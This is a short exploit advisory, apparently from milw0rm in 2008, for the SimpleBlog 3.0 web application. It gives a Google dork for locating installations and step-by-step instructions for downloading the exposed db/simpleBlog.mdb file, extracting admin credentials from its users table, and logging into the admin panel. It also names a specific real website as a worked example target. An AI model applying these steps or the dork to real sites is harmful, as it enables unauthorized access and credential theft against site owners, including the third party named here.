[»] SimpleBlog 3.0 Mdb Vulnerability [»] [»] ---------------------------------------------------------- [»] Author : EL_MuHaMMeD [»] [»] Date : 26.11.2008 [»] [»] Contact : cwelmuhammed@gmail.com [»] [»] ----------------------------------------------------------- Script : SimpleBlog 3.0 Download : http://www.8pixel.net/FetchFile.aspx?doc=simpleblog3.rar Dork : "inurl:simpleblog3" Our mdb path : db/simpleBlog.mdb Exploits : Step 1 - http://www.[target].com/[path]/simpleblog3/db/simpleBlog.mdb Step 2 - Download that mdb file and read admin name & pass from "users" table. Step 3 - http://www.[target].com/[path]/simpleblog3/admin/default.asp Example : http://www.bvrg.org.uk/simpleblog3/db/simpleBlog.mdb http://www.bvrg.org.uk/simpleblog3/admin/default.asp [»] ---------------------------------------------------------------------- [»] [»] Cyber-Security.ORG - ELMuHaMMeD.COM [»] [»] ---------------------------------------------------------------------- # milw0rm.com [2008-11-25]